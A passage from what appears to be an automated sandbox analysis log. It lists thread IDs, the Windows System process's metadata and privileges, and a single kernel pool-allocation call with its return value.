Thread: id = 162 os_tid = 0x380 Thread: id = 163 os_tid = 0x37c Thread: id = 164 os_tid = 0x364 Thread: id = 165 os_tid = 0x34c Thread: id = 166 os_tid = 0x338 Thread: id = 177 os_tid = 0x930 Thread: id = 185 os_tid = 0xa94 Process: id = "10" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 189 os_tid = 0x8 Thread: id = 190 os_tid = 0x9c Thread: id = 191 os_tid = 0x3c [0216.038] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1cfe7, Tag=0x70764946) returned 0xfffffa80019df000 Thread: id = 192 os_tid = 0xc0 Thread: id = 193 os_tid = 0x28 Thread: id = 194 os_tid = 0x44 Thread: id = 195 os_tid = 0x40 Thread: id = 196 os_tid = 0x38 Thread: id = 197 os_tid = 0x5c Thread: id = 198 os_tid = 0x34 Thread: id = 199 os_tid = 0xc4 Thread: id = 200 os_tid = 0xcc Thread: id = 201 os_tid = 0xd0 Thread: id = 202 os_tid = 0xb8 Thread: id = 203 os_tid = 0xd4 Thread: id = 204 os_tid = 0xd8 Thread: id = 205 os_tid = 0xdc Thread: id = 206 os_tid = 0xe8 Thread: id = 207 os_tid = 0xec Thread: id = 208 os_tid = 0x48 Thread: id = 209 os_tid = 0x64 Thread: id = 210 os_tid = 0x2c Thread: id = 211 os_tid = 0xfc Thread: id = 212 os_tid = 0x104 Thread: id = 213 os_tid = 0x114 Thread: id = 214 os_tid = 0x108 Thread: id = 215 os_tid = 0x4c Thread: id = 216 os_tid = 0x84 Thread: id = 217 os_tid = 0x10c Thread: id = 218 os_tid = 0xb0 Thread: id = 219 os_tid = 0x12c Thread: id = 220 os_tid = 0x130 Thread: id = 221 os_tid = 0x134 Thread: id = 222 os_tid = 0x138 Thread: id = 223 os_tid = 0x174 Thread: id = 224 os_tid = 0x90 Thread: id = 225 os_tid = 0x80 Thread: id = 226 os_tid = 0x98 Thread: id = 227 os_tid = 0x78 Thread: id = 228 os_tid = 0x8c Thread: id = 229 os_tid = 0x100 Thread: id = 230 os_tid = 0x74 Thread: id = 231 os_tid = 0x26c Thread: id = 232 os_tid = 0x68 Thread: id = 233 os_tid = 0x2dc Thread: id = 234 os_tid = 0x88 Thread: id = 235 os_tid = 0x3b0 Thread: id = 236 os_tid = 0x24 Thread: id = 237 os_tid = 0x45c Thread: id = 238 os_tid = 0x4d8 Thread: id = 239 os_tid = 0x4fc Thread: id = 240 os_tid = 0x504 Thread: id = 241 os_tid = 0x518 Thread: id = 242 os_tid = 0x574 Thread: id = 243 os_tid = 0x5b8 Thread: id = 244 os_tid = 0x5c4 Thread: id = 245 os_tid = 0x5cc Thread: id = 246 os_tid = 0x5d0 Thread: id = 247 os_tid = 0x5d4 Thread: id = 248 os_tid = 0x5ec Thread: id = 249 os_tid = 0x60 Thread: id = 250 os_tid = 0x20 Thread: id = 251 os_tid = 0x94 Thread: id = 252 os_tid = 0x18 Thread: id = 253 os_tid = 0x464 Thread: id = 254 os_tid = 0x460 Thread: id = 255 os_tid = 0x70c Thread: id = 256 os_tid = 0x50 Thread: id = 257 os_tid = 0x7f4 Thread: id = 258 os_tid = 0x534 Thread: id = 259 os_tid = 0x0 Thread: id = 260 os_tid = 0xbc Thread: id = 261 os_tid = 0x508 Thread: id = 262 os_tid = 0xa0 Thread: id = 263 os_tid = 0x11c Thread: id = 264 os_tid = 0x90